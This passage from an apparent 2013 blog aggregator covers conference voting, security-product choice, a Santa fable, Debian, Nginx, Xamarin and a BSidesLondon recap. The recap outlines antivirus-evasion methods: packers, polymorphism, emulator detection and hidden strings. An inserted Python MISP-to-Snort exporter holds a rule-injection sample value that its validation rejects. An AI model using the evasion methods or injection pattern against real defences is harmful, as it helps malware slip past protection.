These two examples are on opposite extremes of voting. One conference simply disregards completely what people vote on. If I had voted or bought a ticket, I would feel lied to. Why waste the time of so many people? The other conference puts so much stock in the vote, that I feel the final result was strongly affected. I seriously doubt all those Windows 8 voters actually showed up.
Does anyone have good experiences with conference voting that did work? Feel free to share!
May 06, 2013
Xavier Mertens
Mine is Bigger Than Yours!
Everybody has already faced the same situation: children like to compare themselves with each other! Put kids in the same room and let them play. Comparisons will start soon: “My dad has a bigger car than yours“, “My plane flies better than yours“, “I can run faster than you“, etc. Sometimes I feel exactly the same during conversations about infosec products, and I’m pissed off by this. My opinion is that infosec people also tend to be proud of their security solutions and compare them to others. Like in a kindergarten…
It’s a fact: humans don’t like to admit their errors. It’s not easy to concede a bad choice and say that your security solution does not fulfill its job. But why pretend to have the top-notch killer device on the other side? Remember, years ago, the flame war between Linux and Windows users? (Honestly, I took part in this game when I was young.)
Sometimes colleagues or customers ask me what’s the best choice between “x” and “y“. It’s always difficult for me to answer such questions from a cold start. First of all because, most of the time, I don’t have enough background to compare them. Of course, the market is full of studies and analyses like the well-known Gartner magic quadrant. Those can help you make a first selection. Some vendors ask research firms to compare their product with direct competitors. If they “asked“, it means they also “paid” for these studies. In a customer-supplier relationship, the customer must be happy. Can we be certain that the results of the study are fully independent? I have my doubts…
Personally, the best solution is the one which will solve YOUR issue and match YOUR requirements in terms of:
- Budget
- Features
- Integration in your environment
- Management & Support
Keep in mind that your information security is a big marketplace where all vendors would like their share of the cake… Select two or three solutions, ask for live demos, set up a PoC (“Proof of Concept“). This will cost time and money, but you will then hold all the keys to make the right decision. Don’t buy a brand, buy a solution!
Lionel Dricot
Anton’s letter
Once upon a time there was a child called Anton. Anton lived in a very poor family. On Sundays the family shared an artichoke and, for the rest of the week, made do with steeping the leaves of Sunday’s artichoke, sometimes adding a few dandelions that Anton picked on the way to school.
Anton’s father worked at the coin-cleaning factory. At the end of each year his boss congratulated him and granted him a small bonus. That bonus was spent entirely on a Christmas present for Anton and a meal for the whole family.
This year, when the factory director asked to see him, Anton’s father wondered whether he would buy an illustrated book or coloured pencils. He would wrap the present in silver paper and slip it, at night, in front of the fireplace. He would nibble a piece of the artichoke that Anton would have left out for Santa’s reindeer, then go to bed, imagining the joy sparkling in his son’s eyes.
But the director did not look very cheerful. He was nervously chewing a big, foul-smelling cigar.
“The news isn’t good,” he told Anton’s father. “The crisis is making us lose interest on the capital of our derivative investments. We need to improve overall profitability. That is why, from now on, we will send the coins to China, where gloves and masks are not compulsory for handling hydrochloric acid. Unfortunately, we must temporarily let our cleaners go, until the cost of kerosene exceeds that of masks and gloves.”
Anton’s father did not know what to say. For Christmas dinner that evening they made do with the traditional artichoke. All night Anton’s dad tossed and turned, trying to forget the disappointed look his son would have the next day on finding no present. Then, struck by a sudden inspiration, he got up, took a pencil and a fresh sheet of paper, and took a bite of the artichoke. He went back to bed, reassured.
The next morning, Anton rushed out of his room but found, at the foot of the fireplace, only a sheet of paper on which was written:
“Dear Anton,
As you know, I tend to give only one present a year to children who have been good.
But this year you have been particularly good. Rather than give you a single present, I have decided to give you presents for the rest of your life.
Every time you are happy, every time your mum kisses you, every time your dad strokes your hair, that will be a present from me.
But every time you feel unhappy, think. Deep down, you will realise that perhaps you have not been good enough.
Be good and I will fill you with happiness,
Santa Claus”
Anton handed the letter to his dad:
“Santa wrote to me. Is it really him, Dad? Is it a real letter from Santa?”
“Who else would it be from?” said Anton’s dad.
Smiling, he ran his hand through his son’s hair. Anton then knew, deep down, that the letter was real. As if to confirm his intuition, Mum kissed him and wished him a merry Christmas. His eyes sparkled with joy.
But the crisis hit the whole town hard. Interest rates collapsed, bubbles burst, shares stalled and options vanished. Every family found itself in difficulty.
Anton was at the age where, in the playground, children start to exercise their critical sense. One had caught his parents putting out the presents. Another wondered how Santa could go down so many chimneys in a single night. A third calculated the size of the sleigh needed to carry enough presents. But Anton countered all these arguments by producing his letter.
Told of this by their children, the parents found it a very good idea for saving money in a time of crisis or, as the government called it, a period of austerity. And since paper and pencils were themselves starting to run short, the parents contented themselves with repeating a message delivered by Santa in person, who had come that night but had not wanted to wake the children.
The parents grew old, the children grew up and became parents in their turn. Every Christmas Eve, the youngest were told how Santa rewarded good children. And when a child brighter than the others asked whether Santa existed, they were told the story of Anton, who had received a real letter. A copy of that letter could be found in any house in the country. It was even learned by heart at school, to the dismay of the printer who had made a fortune publishing the letter for the first time.
In the universities, doctoral theses were written to find out why Anton had been chosen rather than someone else. Others claimed that if you translated the letter into Eskimo, shuffled the letters and then read only those in positions corresponding to a prime number, you obtained Santa’s address. The Faculty of Sleigh Aeronautics appeared and trained generations of scientific researchers.
One day, a student declared loud and clear that he did not think Santa existed. Besides, he said, we no longer have the slightest proof of his existence. In ancient times he brought tangible presents. But those are surely just tales. How could he have delivered so many presents in a single night?
He was told that if he did not believe in Santa, he had no reason to be good, and so he would be unhappy. That the fact that happy things happened to him was proof of Santa’s existence. That this amounted to calling his parents liars for having made him believe in something that did not exist. That he, a mere student, dared to call the whole Faculty of Sleigh Aeronautics liars?
But fine, that was his business. If he wanted, he could choose not to believe and not to be good. Nobody was going to kill him; this wasn’t the flat-earthers. But there was no question of seeing him at the family Christmas dinner or at the Christmas party with his friends.
Since our student loved his parents, his family, his friends and the Faculty of Sleigh Aeronautics, he replied that perhaps Santa did not want to be seen precisely in order to test those who were truly good.
This was considered a very good explanation. And everyone applauded, telling themselves that at least the children were good, that everyone had moments of happiness, and that Santa must be pleased with them.
Photo by Robert Orr
May 04, 2013
Wouter Verhelst
Oops, I did it again...
For (at least) the third time, I managed to register for debconf before registration was actually open. Oops.
I found out that unfortunately, it's not quite certain yet that there will actually be a debcamp this year—and if there is going to be a debcamp, it won't be a full week. Pity. At any rate, I'll be there the whole time, whatever the duration of debcamp.
Since Vaumarcus is closer to Mechelen than Edinburgh (by about 250km), this is going to be the closest debconf for me, ever. And if I could go to Banja Luka by car, I can certainly go to Vaumarcus by car.
Anyone care to join me?
May 03, 2013
Thomas Vander Stichele
If I was 16 years younger…
I’d totally try and be the intern for pinboard.
The money is great for a summer job, but that’s not the important part. pinboard seems interesting, it’s a real service, and it’s (I assume) small enough to understand from top to bottom. Contrary to, say, a Google Summer of Code project, you get to touch a real existing service, and from what I can tell from the blog you get to do it with a smart and funny guy.
You’ve got five weeks left; even if you’re in the middle of exams right now, apply!
(And if you do, why not add the features to merge and rename tags while you’re at it?)
Frank Goossens
Music from Our Tube; Seelenluft
Friday evening, time to pretend you’re a young hipster! And this might help: a great (old, as in over 10 years old) track called “Manila” by Seelenluft in the Manitoba remix, as featured in Four Tet’s magnificent “Essential Mix” from way back in 2010:

Watch this video on YouTube or on Easy Youtube.
The vocals are by Michael Smith, who apparently was only 12 years old when recording “Manila”. There are multiple remixes of it (and the official clip for the Ewan Pearson remix is pretty funny), but none are as wild as this one. Love those crazy horns; they remind me of (the more recent) Neneh Cherry & The Thing with their freaky cover of Springsteen’s “Dream Baby Dream” (which Four Tet remixed as well).
Ruben Vermeersch
Mono is life improvement for mobile developers
Being a developer myself, I’m constantly looking at how to improve my way of working. When it comes to mobile development, the best way to improve your life is by using Mono (Xamarin.iOS and Xamarin.Android).
That’s, in a nutshell, the talk I’ve given today at Apps City: an introductory tour on Xamarin.iOS and Xamarin.Android.
Slides are over here, though they’re very light on details and unlike my previous talk, I haven’t had time to annotate them.
May 02, 2013
Les Jeudis du Libre
Mons, May 16: Who contributes to Wikipedia, and why?
This Thursday, May 16, 2013 at 7 pm, the nineteenth Mons session of the Jeudis du Libre of Belgium will take place.
The topic of this session: Who contributes to Wikipedia, and why?
Theme: Internet|community
Audience: general public
Speaker: Nicolas Jullien (LUSSI, M@rsouin, Institut TELECOM Bretagne & UEB)
Venue: Mundaneum, 76 rue de Nimy, 7000 Mons (see this map on the Openstreetmap site)
Participation is free and only requires registration by name, preferably in advance, or at the door. Please indicate your intention (even if uncertain) by registering via http://jeudisdulibre.fikket.com/
The session will be followed by a friendly drink, offered by the A.S.B.L. LoLiGrUB, co-organiser of the Jeudis du Libre.
If you are interested in this monthly series, feel free to consult the agenda and subscribe to the mailing list so that you receive every announcement.
As a reminder, the Jeudis du Libre are meetings around Free Software topics. The Mons sessions take place every third Thursday of the month and are organised on the premises of, and in collaboration with, the Hautes Écoles and university faculties of the Pôle Hainuyer of higher education involved in training computer scientists (UMONS, HECFH and Condorcet), with the support of the A.S.B.L. LoLiGrUB, which is active in promoting free software.
Description: Wikipedia is undoubtedly today the best-known example of an open online community that lets anyone contribute to improving the body of knowledge available online. Since not everyone participates, as in other online projects, one may ask who the people who participate are and why they participate.
After a general presentation of Wikipedia, and before a discussion with the audience, we will present the results of a survey of contributors to the Wikipédia-fr project (French-language Wikipedia).
Additional information: Nicolas Jullien will also give a talk as part of the InforTech seminar at 5 pm (FPMS, rue de Houdain).
Short biography of the speaker: A lecturer and researcher at Télécom Bretagne, Brest, Nicolas Jullien has been studying online communities (free software, encyclopedias, professional communities) since the early 2000s. He is interested in the reasons for participating in such communities, the different stages of participation, the way companies cooperate with communities, and the link between community learning and the labour market.
Patrick Debois
The future of devops
I had a blast at Devopsdays Austin 2013. Here's my keynote on the 'future of devops'.
My main point is that besides repeating the devops stories, we also need to seek diversity and make sure we keep adapting to situations.
The slides are available on slideshare - http://www.slideshare.net/jedi4ever/future-ofdevopsv2
May 01, 2013
Wim Leers
Practical WPO intro
I was asked to do an introductory session on WPO for the course “Network software and architectures” at Hasselt University and interweave that with my story (how my WPO-related bachelor & master thesis got me an internship at Facebook) to indicate this is not a far-fetched thing — any one of the students in the audience can do this, if they’re interested!
Required background: general web development knowledge, general network knowledge, know what a CDN is.
April 30, 2013
Frank Goossens
Ceremonies, the monopoly of the (Catholic) Church?
The churches are emptying, but roughly 5 times in a human life (baptism, first communion, second communion, marriage and death) the Catholic Church still plays an unmistakably large role in the lives of many believing and even non-believing Belgians (and French and Spaniards and …). Anyway, Michel already wrote about this at length, so I don’t need to do that here.
But “no!”, the (Catholic) Church has long since lost its monopoly on life’s big moments. Because “yes!”, there are alternatives, certainly for non-believers.
It simply depends on what you want to make of it, how you want to celebrate those big moments. Veerle and I are deeply non-religious and in 2002, together with a great woman from what was then still called the Unie van Vrijzinnige Verenigingen, we worked out our own wedding ceremony. With that same woman we celebrated the birth of our daughter in July 2006 in a way that was meaningful to us. And Elise has just had her Lentefeest.
It’s just what you want to make of it, what is meaningful to you. If you are a believer and want to celebrate birth, marriage and death in and with the Church, fantastic. But if that is not really the case, think for a moment about the alternatives. And perhaps contact the “Huis van de Mens” to talk about how you yourself can give meaning to those great moments in life?
Wim Coekaerts
Oracle Secure Global Desktop 5.0
Anyway, a few nice things that I personally like in the new release :
(1) HTML5 client support. In particular, at this time, the iPad. So now I can use my iPad to log into SGD and connect to my apps without having to download and install a client. It just works with the built-in Safari browser. We will expand this over time; right now it's iPad only.
(2) the tta rpm will automatically pull in all its dependencies on Oracle Linux 6. So all you need to do is download the tta (SGD) rpm from oracle.com and type yum install tta-5.00-907.i386.rpm. When Oracle Linux is configured to connect to ULN or to http://public-yum.oracle.com, it will grab all the required OS rpms. This makes it super easy to install and get going.
To download the software, go to http://edelivery.oracle.com, go to the Oracle Desktop Virtualization Products product pack and click on Oracle Secure Global Desktop 5.0 Media Pack.
April 29, 2013
Wouter Verhelst
Linux 3.9
... was released yesterday, apparently. This wouldn't be very special, except that it carries a 'patch' by yours truly. It isn't earth-shattering, but hey, I can run 'git log' and find myself, now, in a released kernel.
If that isn't nice.
New in wheezy: NBD named exports and installer support
Just after the release of squeeze, I released nbd 2.9.17, which had a new feature that required a backwards-incompatible change: the ability to specify an export by name, rather than by port number. Obviously, that means wheezy will be the first release to ship with support for such named exports (although a backport with support for them was uploaded to squeeze-backports). After all, a name is a far more obvious way to specify an export than a meaningless number. The init scripts and root-on-NBD support were updated, although a bugfix was denied for r0 (it will hopefully get into r1).
In addition, during the wheezy cycle I finally finished the partman-nbd support in the installer. With this, it is possible to install Debian to an NBD device on diskless systems, which is nice.
New in Wheezy: PMW
One of the things I do with computers is "do stuff with music". I'm not a professional musician by any means, but I do sometimes have a need for some software to do some music editing.
In the past, that meant using GNU LilyPond; and while that's certainly an interesting piece of software, it has some idiosyncrasies that have made me dislike it in the past. So when I learned about PMW, written by Philip Hazel (of PCRE and Exim fame), I was intrigued.
PMW has several advantages over lilypond, in my opinion. To name but two: its syntax is less silly, and it takes far less time to convert something from source to graphic, to the extent that I've considered creating an editor which would update the result after every keystroke, something that just isn't possible with lilypond.
The decision to upload pmw into Debian was just a no-brainer, and it's saved me some time since, already. Enjoy!
April 28, 2013
Frank Goossens
Little daughter is getting (too) big
Yesterday we celebrated that our little daughter is no longer a clumsy toddler, but has become an independently thinking child.
That independent thinking, we will no doubt curse it yet, but she is a sweet, smart and funny wonder of a child, our Elise. She can stop growing now, it’s fine as it is!
April 27, 2013
Christophe Vandeplas
MISP - Malware Information Sharing Platform
MISP, the Malware Information Sharing Platform, has been developed in collaboration between the Belgian Defence CERT and the NATO Computer Incident Response Capability (NATO NCIRC) and is today actively developed and used in production.
The problem we experienced in the past was the difficulty of exchanging information about (targeted) malware and attacks within a group of trusted partners, or under a bilateral agreement.
Even today, much of the information exchange happens in unstructured reports from which you have to copy-paste the information into your own text files, which you then have to parse to export to (N)IDS and systems like log search engines, etc.
To facilitate the exchange of technical information we started to develop this tool, which:
- automates the exchange of IOCs
- makes your internal IOC database accessible (including uploaded malware samples and reports, ...)
- correlates different malware samples and events
- generates files in various export formats (snort/IDS, plain text, xml, ...) (in the future MAEC and other IOC formats)
This results in faster detection of targeted attacks and improves the detection ratio while reducing false positives. We also avoid reversing similar malware, because we learn quickly that others have already worked on it.
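The last list item above describes exporting shared indicators as IDS rules and plain text. Below is an added example of that step, written for this page and not MISP's own code: it takes a constructed event (documentation addresses and a hash of the empty string, not real indicators; the attribute type names 'ip-dst', 'domain' and 'md5' are an assumption rather than MISP's schema), validates each value against a strict syntax for its type, and emits Snort rules and a plain-text list. The validation is the part worth keeping: an indicator pulled from a partner's feed ends up inside rule text that an IDS parses, so a malformed value is dropped rather than exported.

```python
import re

# Constructed sample event (added example, not MISP code): documentation
# addresses and a well-known hash stand in for real indicators, and the
# attribute type names are an assumption, not MISP's schema.
SAMPLE_EVENT = {
    "id": 42,
    "info": "constructed example event",
    "attributes": [
        {"type": "ip-dst", "value": "198.51.100.23"},
        {"type": "domain", "value": "update.example.net"},
        {"type": "md5", "value": "d41d8cd98f00b204e9800998ecf8427e"},
        # Deliberately malformed feed entry that must never reach the IDS:
        {"type": "domain", "value": 'evil"; sid:1; rev:1;) alert'},
    ],
}

# Strict syntax per attribute type. Exported values land inside Snort rule
# text and blocklists, so anything that does not match is dropped, not escaped.
VALIDATORS = {
    "ip-dst": re.compile(
        r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$"),
    "domain": re.compile(
        r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I),
    "md5": re.compile(r"^[0-9a-f]{32}$", re.I),
}


def valid_attributes(event):
    """Return the event's attributes whose value matches the syntax of its type."""
    keep = []
    for attr in event["attributes"]:
        pattern = VALIDATORS.get(attr["type"])
        if pattern and pattern.match(attr["value"]):
            keep.append(attr)
    return keep


def dns_wire_content(domain):
    """Encode a domain as the length-prefixed labels seen in a DNS query,
    in Snort's mixed text/|hex| content notation."""
    labels = domain.lower().split(".")
    return "".join(f"|{len(label):02x}|{label}" for label in labels) + "|00|"


def snort_rules(event, base_sid=1000000):
    """One alert rule per network indicator; hashes have no Snort form and are skipped."""
    rules = []
    sid = base_sid
    for attr in valid_attributes(event):
        msg = f"MISP event {event['id']} {attr['type']} {attr['value']}"
        if attr["type"] == "ip-dst":
            rule = (f"alert ip $HOME_NET any -> {attr['value']} any "
                    f'(msg:"{msg}"; sid:{sid}; rev:1;)')
        elif attr["type"] == "domain":
            rule = (f"alert udp $HOME_NET any -> any 53 "
                    f'(msg:"{msg}"; content:"{dns_wire_content(attr["value"])}"; '
                    f"nocase; sid:{sid}; rev:1;)")
        else:
            continue
        rules.append(rule)
        sid += 1
    return rules


def plain_text_export(event):
    """One validated indicator value per line, de-duplicated and sorted."""
    values = sorted({attr["value"].lower() for attr in valid_attributes(event)})
    return "\n".join(values) + "\n"


if __name__ == "__main__":
    print("\n".join(snort_rules(SAMPLE_EVENT)))
    print(plain_text_export(SAMPLE_EVENT))
```

Hashes have no Snort equivalent and are only written to the plain-text list; the DNS rule matches the length-prefixed label form of the domain as it appears on the wire in a query, not the dotted string. The malformed fourth attribute fails the domain check and so never becomes a rule, which is the failure mode a shared feed has to be designed around.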

(...)

April 26, 2013
Stephane Delcroix
Decorating your Xamarin.iOS code with Behaviors
Every time you have to ask your user "What's your favourite colour?" or "What is the air-speed velocity of an unladen swallow?" from within your iOS application, you have to ask yourself "Wait, will the field still be visible with the virtual keyboard displayed?"
I don't know how you do it (experience sharing is welcome), but me, I do it this way:
public override void ViewDidLoad ()
{
    base.ViewDidLoad ();
    //Set Bindings and Commands
    placeField.Bind (ViewModel, "Place");
    sendButton.Command (ViewModel.SendCommand);
    busyIndicator.Bind (ViewModel, "IsBusy");
    //Slide the view on keyboard show/hide
    placeField.EditingDidBegin += (sender, e) => {
        UIView.BeginAnimations ("keyboardslide");
        UIView.SetAnimationCurve (UIViewAnimationCurve.EaseInOut);
        UIView.SetAnimationDuration (.3f);
        var frame = View.Frame;
        frame.Y = -100;
        View.Frame = frame;
        UIView.CommitAnimations();
    };
    placeField.EditingDidEnd += (sender, e) => {
        UIView.BeginAnimations ("keyboardslide");
        UIView.SetAnimationCurve (UIViewAnimationCurve.EaseInOut);
        UIView.SetAnimationDuration (.3f);
        var frame = View.Frame;
        frame.Y = 20;
        View.Frame = frame;
        UIView.CommitAnimations();
    };
}
It works fine, but looks messy next to readable code setting bindings or commands (those come from a very light Binding library I'm working on). Then yesterday evening, I had a realisation. It looks very similar to Silverlight Behaviors, so this code could just be like:
placeField.Attach (new SlideOnEditBehavior (View, defaultPosition:20, alternatePosition:-100));
And the SlideOnEditBehavior is kept aside (OnDetaching implementation left out for clarity):
public class SlideOnEditBehavior : Behavior
{
    UIView view;
    int defaultPosition;
    int alternatePosition;

    public SlideOnEditBehavior (UIView view, int defaultPosition, int alternatePosition)
    {
        this.view = view;
        this.defaultPosition = defaultPosition;
        this.alternatePosition = alternatePosition;
    }

    protected override void OnAttached ()
    {
        base.OnAttached ();
        AssociatedObject.EditingDidBegin += (sender, e) => {
            UIView.BeginAnimations ("keyboardslide");
            UIView.SetAnimationCurve (UIViewAnimationCurve.EaseInOut);
            UIView.SetAnimationDuration (.3f);
            var frame = view.Frame;
            frame.Y = alternatePosition;
            view.Frame = frame;
            UIView.CommitAnimations();
        };
        AssociatedObject.EditingDidEnd += (sender, e) => {
            UIView.BeginAnimations ("keyboardslide");
            UIView.SetAnimationCurve (UIViewAnimationCurve.EaseInOut);
            UIView.SetAnimationDuration (.3f);
            var frame = view.Frame;
            frame.Y = defaultPosition;
            view.Frame = frame;
            UIView.CommitAnimations();
        };
    }
}
Cleaner. Simpler. Reusable. And it also supports BehaviorCollections:
placeField.Attach (new BehaviorCollection {
new SlideOnEditBehavior (View, defaultPosition:20, alternatePosition:-100),
//Any other behavior here
});
As expected, the code for all of this is trivial, but if you like the idea and save yourself the 30 minutes it takes to write it, it's on Github.
[UPDATE: 2013-04-26] I updated the code as per Stuart Lodge suggestion (of MvvmCross) to use WeakReference to NSObjects. Doesn't change the API at all.
April 25, 2013
Mattias Geniar
Nginx: nginx: [warn] load balancing method redefined
You may receive the following warning when reloading/configtesting an Nginx configuration that uses upstreams.
$ service nginx configtest
nginx: [warn] load balancing method redefined in /etc/nginx/conf.d/upstream.conf:5
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
This can occur when you have conflicting directives inside your upstream, like so:
$ cat upstream.conf
upstream upstream_name {
# Use max # keepalive connections
keepalive 120;
# Use the backend with least number of connections
least_conn;
# All upstream members defined below
server 192.168.1.5:80 weight=24;
server 192.168.1.6:80 weight=24;
}
The warning is caused by mixing 'keepalive' and 'least_conn'; use either one but don't mix both.
Wouter Verhelst
Dear supplier,
I don't usually blog about work, but this time around, you maxed it.
When I specifically ask you to not ship goods, I have good reasons for that. Specifically:
- I'm not at my office all the time. Yes, I'm often there, but I'm also often at a customer's place (you know, so I can actually make money). When I'm not at a customer, I tend to be at the office in a noon-through-evening schedule, rather than a morning-through-late-afternoon one (I hate getting out of bed if I don't have to). Since we don't have any employees, this likely means your logistics partner will find a closed door with nobody answering the bell.
- The result of that is that we'll often find that your shipments end up at your logistics partner's warehouse. Since I have to drive to a warehouse anyway, I might as well choose to drive to the warehouse that is closest—yours.
- For this "service" of shipping goods away from interesting locations, you charge €20+.
Not Happy(tm)
April 24, 2013
Xavier Mertens
BSidesLondon 2013 Wrap-Up

This was already the third edition of BSidesLondon today! Time flies! Being busy yesterday, I only reached London in the morning and arrived just in time for the administrative tasks (registration, picking up a t-shirt and goodies), grabbing some coffee and shaking some hands. BSidesLondon is definitely growing in size and quality: a huge number of attendees, two tracks, a rookie track, a job fair, workshops and lightning talks. Even the sun was present over London, no fog at all! Two tracks means you have to make choices! Here is a brief overview of my schedule.
The first presentation I attended was “Pentesting like a Grandmaster” by Abraham Aranguren. The talk was split into two parts. First, Abraham started with an interesting comparison: “Pentesting == a chess game“. This can be summarised with the picture below:

How far can you go with “your” intelligence? Success is always possible. There are many examples of great people who made awesome stuff with a normal IQ. Intelligence does not guarantee success. One fact: it’s important to start early; this is an advantage. Talent is something natural, and skills must be developed by hours and hours (days or months) of training. The comparison continues with the chess game. As reported by many chess champions: “You can only be good at chess if you love the game“. It’s exactly the same in information technology (generally speaking – not only security). Some quotes are so true: ”No pain, no gain” (Arnold Schwarzenegger), “Pain is temporary” (Muhammad Ali). The next question could be how to stay motivated. Like in high-level sports, you must remain healthy (in your body as well as in your mind). Another interesting quote I liked:
“Smart people learn from their mistakes. But the real sharp ones learn from the mistakes of other people” (Brandon Mull)
Abraham reviewed good tips to stay healthy and keep your attention. In the second part of the talk, he explained why game preparation is key (again, in chess and in pen testing). Before the game: scope better, do better. Know the enemy but know yourself (strengths & weaknesses). Finally, some examples were reviewed of how good preparation helps to pwn your target easily. But keep in mind: when media report an exploit “in seconds“, it usually took days or weeks to prepare it. The examples were demonstrated using Abraham’s project: OWTF. I liked the comparison between the two worlds, which initially have nothing in common. Great talk to start the day.
For the second talk, my choice was to follow Javvad Malik about his own story “How to build a personal security brand that will stop the hackers, save the world and get you the girl“. What a program! The room was so crowded that people were sitting on the ground! This is always a good sign. Javvad is a showman; have a look at his YouTube channel about information security, a must see. His talk was a reflection about people who are “bankable” in information security. Starting with a fact: why does everybody consider Mother Teresa a personality? It’s the same in information security. Javvad showed a nice graph of knowledge vs fame. Then he defined three levels: echo chamber, industry, public, and put famous people on it:

(Note: the hidden face is Gregory Evans)
The key is the message you have to pass and how to deliver it. Today, we have access to the same tools and services as professionals had a few years ago to promote ourselves. How to find the right idea to promote ourselves? Via podcasts, blogs, mentors & continuous feedback. Often security people act like the actors doing the promotion of Hollywood movies: they visit many places, face the same questions and constantly repeat the same sentences. The same message is broadcast again & again. But what makes a good infosec guy? Javvad showed two pictures of fish & chips: prepared with the same food but presented differently. The same may apply to blogs: a blog post could be very good research but badly presented. Also, the message we have to deliver is often bad news: “you got owned“, “you lost data“, etc. Then procrastination and the comfort zone are part of the game. Being a “public” man forces you to remain visible. Question to the audience: “Who has a blog and has not updated it for a long time?” I personally know this feeling. We do this in our free time but have wives and kids. Another tip: “Do not feed the troll“. There is a difference between trolling and criticism. Javvad’s recipe was:
- He discovered himself
- He created his own rules
- He believed
Excellent non-technical presentation, but with true content and a lot of fun.
The third talk was presented by my friend Chris John Riley: “Defense by Numb3r5” or “Making problems for script k1d13s and scanner monkeys“. Chris started with a description of the use of HTTP return codes. You know the 2xx, 3xx, etc. Some are common, others less so, like 206 which means “partial content“. Most of them are defined in RFC 2616 and divided into five classes of response:
- 1xx (info)
- 2xx (success)
- 3xx (redirection)
- 4xx (client error)
- 5xx (server error)

Personally, I like the 402 – “payment required“. Chris’s question is: why talk about numbers? For security reasons, of course. What can we do with them? Unpredictability is to your advantage in your defense layer. Increase attacker costs, delay operations. There were already some ideas about this topic but not very deeply analysed. So, how to use this? Browsers have to be flexible. This leads to interpretation! But wait, there are RFCs for that? They’re more than a guideline. What can possibly go wrong? Chris did some testing using a MitM proxy written in Python. Goal of this proxy: if the response code is not 200, respond with a 200. An example script is available on his blog:
http://catch22insecurity.com/POC/respcode.php?code=200
Chrome, Firefox and Internet Explorer were tested against all codes with HTML, iframe & JavaScript pages. What a surprise: they interpret them differently. Codes are often associated with headers, e.g. 302 & Location:. If headers are missing, what happens? What can we do with this:
- Browser fingerprinting (a UA can be spoofed, but behaviour cannot)
- Proxy detection
Let’s put all the stuff together. Simply fuck with things and defeat attackers (slowing them down, causing false positives/negatives, etc). By changing the answers to HTTP requests performed by crawlers and scanners, Chris demonstrated the different kinds of results, with, depending on the case, many false positives or false negatives. Finally, he had the idea of writing an HTTP tarpit: the sources of attacks detected by a WAF are sent to a bad list on the server, which then rewrites all the responses to those IPs. Even funnier, Metasploit also bases its attacks on HTTP response codes (>800 occurrences found in the code). Chris’s conclusion: “No match, no shell“. Script kiddies go away! The MitM proxy code is available here.
After a sunny lunch break outside and some Club-Mate, my schedule continued with Stephen Bonner and his “Make cyber-love not cyber-war” talk. Based on slides with pictures only, Stephen reviewed the current situation of cyber-war and explained why he does not like this expression. Very good speaker, good interactivity with the audience, but I was not attracted by the topic.

Then followed “Pentest automation – Helping you to get to the pub on time” with Rory McCune. The goal of this talk was to review different ways to optimise your time during pentesting activities so you can go home early … or to the pub! Rory started with a general question: why automate?
- To save time!
- Repetition is boring and we are all lazy people
- For accuracy: how to not miss interesting stuff?
- To encode your knowledge! If you script it, you won’t forget what you learned
It’s a fact: if you’re a pentester, you must be able to write some code. The next question which arises is: in which language(s)? Rory’s recommendation is to pick one and stick to it. How to choose? The language should be:
- Dynamic
- Provide an Interactive shell
- Focus on development speed
- And have a good 3rd party library support (to easily add extra features to your scripts).

Another tip: use source code control (Subversion, Git, etc); it will save you time and headaches. To learn better, find real examples you need to solve. Then Rory reviewed some nice scenarios where scripts can be helpful. His examples were written in Ruby:
- Expanding a subnet into a list of IP addresses. Easy but so convenient.
- Writing a template using the ‘mechanize‘ Ruby library to automate a two-step authentication process.
- Parsing the output of tools like nmap.
Scripts can also be used to automate very boring tasks: reporting! Major security tools can be extended using plugins or extensions (whatever you call them). Think about Metasploit or Burp Suite. Contribute and add your own code to automate your tasks. A final remark on the presentation: infosec guys complain about the bad quality of code delivered by customers, but they also write bad code to automate their own tasks. Try to write secure code yourself! The examples reviewed by Rory are available on his GitHub account.
The last talk was by Alex Polychronopoulos about “Going Stealth: Staying off your AV radar“. Again an interesting topic for pentesters, who often have to fight with anti-virus programs and try to evade their detection mechanisms. Today’s AV features are:
- Detection
- Identification
- Disinfection
- Some of them implement more funky stuff like built-in IDS, browser add-on, etc ($VENDORS have always plenty of ideas)

Anti-virus evasion can sometimes be quite easy (some files are simply not scanned, like *.tmp or *.ocx files) and less than 5% of new threats are detected. Alex reviewed the different types of analysis. Static analysis is not efficient today. Detection based on signatures is out of business for new threats. The code can be easily obfuscated (via “packers“). Today, dynamic analysis is better (it executes the malicious code and observes its behaviour), but the main weakness of emulators is… the emulation! The malware can slow down execution (using multiple sleep() calls), use uncommon CPU instruction sets or simply detect the emulator (and not perform any malicious activity). How to evade? First tip: think big! Most anti-virus products have a file size limit for performance reasons. Second, what about destroying the AV itself? After all it’s also software like any other, with bugs. Research is always helpful to find new evasion techniques. What about packers? Their goal is to produce a new executable from… an executable, and make it more difficult to detect by AV. Problem: they do not like self-modifying code! Better packers encrypt the code. The key can be randomised for each payload (polymorphism). If you don’t like encryption, use your math classes and implement other algebraic transformations to build a better packer. Don’t forget to hide your strings! (they can also be used as signatures). And don’t forget that any packer, even the best, will itself become a signature at some point. What about metamorphism? Examples: use random registers, substitute instructions, randomly insert junk code. Put all these techniques together to write your best packer. Interesting stuff, but lacking real examples. Some packed files passed through anti-virus would have been fun (with a low detection rate of course).
In parallel to the regular tracks, the rookie track gave the stage to new speakers. There were some interesting topics like:
- Blinking hell – Data extraction through keyboard lock states
- External assessments
- ICMP – The proxy your admin hates to block
I hope that the slides will be released soon! Kudos to the BSidesLondon team for the great event!

After some beers at the after party, I went out for dinner with friends to discuss security around Italian food. Tomorrow, let’s dive into the $VENDORS jungle at InfoSecurity Europe before travelling back to Belgium!
April 23, 2013
Lionel Dricot
Equality for all!
On 23 April, Bernard and Jean-Pierre fell into each other’s arms. Today, with a small group of about a hundred people, they are demonstrating in front of the Élysée demanding a solution. Signs reading “Equality” and “For all” are held up.
— We couldn’t believe it, Jean-Pierre murmurs with a hint of nostalgia. At the time I was truly in love.
The two lovers therefore immediately completed the necessary formalities and, in June 2013, they were among the first homosexual couples married in France. Right afterwards, they bought a flat in the Paris suburbs.
But by September, the couple was falling apart.
— I didn’t know Bernard like this. He became bad-tempered.
Aside, Bernard confides in us:
— That slut Jean-Pierre went out with Sabrina, my best friend, one evening when I was away on a business trip. He had hidden his hetero tendencies well.
As the situation grew tense, the couple decided to divorce. But at the first hearing, surprise: the law only allows divorce between a man and a woman. While the vote of 23 April made marriage accessible to same-sex couples, the same is not true of divorce.
Each refusing to give up the flat they bought together, Bernard and Jean-Pierre are thus forced to cohabit. Something Jean-Pierre finds very trying.
